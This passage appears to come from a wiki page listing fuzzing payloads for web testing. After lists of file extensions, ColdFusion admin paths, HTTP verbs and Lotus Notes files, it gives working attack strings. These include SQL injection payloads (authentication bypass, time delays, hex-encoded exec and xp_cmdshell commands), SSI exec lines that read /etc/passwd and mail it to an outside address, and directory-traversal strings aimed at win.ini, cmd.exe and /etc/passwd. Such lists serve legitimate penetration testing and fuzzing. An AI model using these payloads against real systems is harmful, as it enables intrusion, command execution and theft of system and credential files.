.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
